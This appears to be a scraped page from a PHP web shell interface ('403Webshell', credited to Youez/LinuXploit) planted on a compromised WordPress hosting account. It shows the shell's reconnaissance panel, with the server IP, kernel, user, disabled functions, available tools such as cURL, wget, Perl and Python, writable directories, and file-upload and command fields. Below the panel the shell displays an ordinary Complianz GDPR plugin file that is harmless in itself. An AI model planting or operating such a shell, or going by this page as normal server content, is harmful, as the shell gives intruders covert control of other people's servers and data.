403Webshell
Server IP : 46.105.57.169  /  Your IP : 216.73.216.67
Web Server : Apache
System : Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
User : verseaumee ( 152031)
PHP Version : 8.5.7
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/verseaumee/blueversion/wp-content/plugins/complianz-gdpr/integrations/plugins/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/verseaumee/blueversion/wp-content/plugins/complianz-gdpr/integrations/plugins/lazy-loader.php
<?php
defined( 'ABSPATH' ) or die();
/**
 * Ensure the Lazy Load plugin knows it has work to do by replacing the lazyloaded class back to lazyload, after consent is given.
 * @return void
 */
function cmplz_lazyloader_convert_data_src() {
	ob_start();
	?>
	<script>
		document.addEventListener("cmplz_enable_category", function(){
			document.querySelectorAll('.lazyloaded').forEach(obj => {
				obj.classList.remove('lazyloaded');
				obj.classList.add('lazyload');
			});
		});
	</script>
	<?php
	$script = ob_get_clean();
	$script = str_replace(array('<script>', '</script>'), '', $script);
	wp_add_inline_script( 'cmplz-cookiebanner', $script);
}
add_action( 'wp_enqueue_scripts', 'cmplz_lazyloader_convert_data_src',PHP_INT_MAX );


/**
 * Tell complianz to replace the source to data-src instead of src
 *
 * @param string $target
 *
 * @return string
 */

function cmplz_lazyloader_data_target($target, $total_match){
	return 'data-src';
}
add_filter('cmplz_data_target', 'cmplz_lazyloader_data_target', 100, 2);

Youez - 2016 - github.com/yon3zu
LinuXploit